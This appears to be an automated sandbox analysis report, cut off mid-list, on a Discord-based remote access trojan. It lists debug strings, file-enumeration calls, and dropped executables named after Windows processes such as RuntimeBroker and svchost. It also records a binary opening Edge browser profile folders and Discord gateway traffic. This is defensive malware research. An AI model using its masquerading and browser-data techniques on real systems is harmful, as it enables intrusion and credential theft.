                                  Source: Binary string: *indoC:\Windows\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\dll\System.pdb" source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbBAz source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: 8C:\Windows\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Users\user\AppData\Roaming\Discord rat.pdbi source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: *assembly\GAC_64C:\Users\user\AppData\Roaming\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\Discord rat.pdbpdbp.GAw source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: System.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbk*_ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: RuntimeBroker.exe, 00000005.00000003.1722658950.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmp, hacn.exe, 0000000F.00000003.1784627169.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1786292411.000001470368F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.2009594706.00007FFE01221000.00000002.00000001.01000000.00000017.sdmp
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.PDB source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\System.pdbCiV source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF72000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\symbols\exe\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: *pC:\Users\user\AppData\Roaming\RuntimeBroker2.0.PDBp source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000012.00000002.1997269204.00007FFDEFB6F000.00000002.00000001.01000000.00000016.sdmp
                                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF72000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Windows\Discord rat.pdbpdbrat.pdb91 source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\Discord rat.pdb&0 source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb%+ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\maxim\Desktop\Discord rat c#\Discord rat\obj\Release\Discord rat.pdb source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF2A000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: RuntimeBroker2.0.PDB? source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\exe\Discord rat.pdb+ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb&0 source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbe source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp

                                  Spreading

                                  barindex
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0579B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF72B0579B0
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0585A0 FindFirstFileExW,FindClose,5_2_00007FF72B0585A0
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B070B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF72B070B84
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B0585A0 FindFirstFileExW,FindClose,7_2_00007FF72B0585A0
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B070B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_00007FF72B070B84
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B0579B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00007FF72B0579B0
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B4C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,13_2_00B4C4A8
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B5E560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,13_2_00B5E560
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,15_2_00007FF6D55E7F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,15_2_00007FF6D55E7F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55F1FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_00007FF6D55F1FE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55D8B00 FindFirstFileExW,FindClose,15_2_00007FF6D55D8B00
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0055A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,21_2_0055A69B
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0056C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,21_2_0056C220
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0066A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,29_2_0066A69B
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0067C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,29_2_0067C220
                                  Source: C:\Windows\System32\cmd.exeCode function: 32_2_0000023225B2DCE0 FindFirstFileExW,32_2_0000023225B2DCE0
                                  Source: C:\Windows\System32\tasklist.exeCode function: 38_2_0000016716C6DCE0 FindFirstFileExW,38_2_0000016716C6DCE0
                                  Source: C:\Windows\System32\tasklist.exeCode function: 39_2_00000245E891DCE0 FindFirstFileExW,39_2_00000245E891DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh42_2_00007FFD9BA2D03D
                                  Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: pEXqwa4GxwmcjiDtvHZVTg==Sec-WebSocket-Version: 13Host: gateway.discord.gg
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: pEXqwa4GxwmcjiDtvHZVTg==Sec-WebSocket-Version: 13Host: gateway.discord.gg
                                  Source: global trafficDNS traffic detected: DNS query: gateway.discord.gg
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Aug 2024 08:57:10 GMTContent-Length: 0Connection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVLozOVy8Fk7BeFX7Ni1ydTRST3KHWMMR6MKVKasifwnv77VhA3Mtg5hFW0%2BtQH%2FVCmRtOxyPuvwp16IuVQL6HaAhwEALnKbf21QvYxv%2BEspwbzB1ljE%2FRv%2FZInw1sYeLWOG5Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 8ac49e828eb841ed-EWR
                                  Source: hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
                                  Source: RuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.coS
                                  Source: hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.coa
                                  Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                  Source: RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.000001933365F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788297799.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792455105.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                  Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1724273440.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723805692.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723983433.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.000001933365F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                  Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788297799.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1724273440.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723805692.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723983433.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.2016242056.0000019333660000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.000001470369D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                  Source: RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.2016242056.0000019333660000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.000001933365F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788297799.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                  Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1724273440.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723805692.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723983433.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 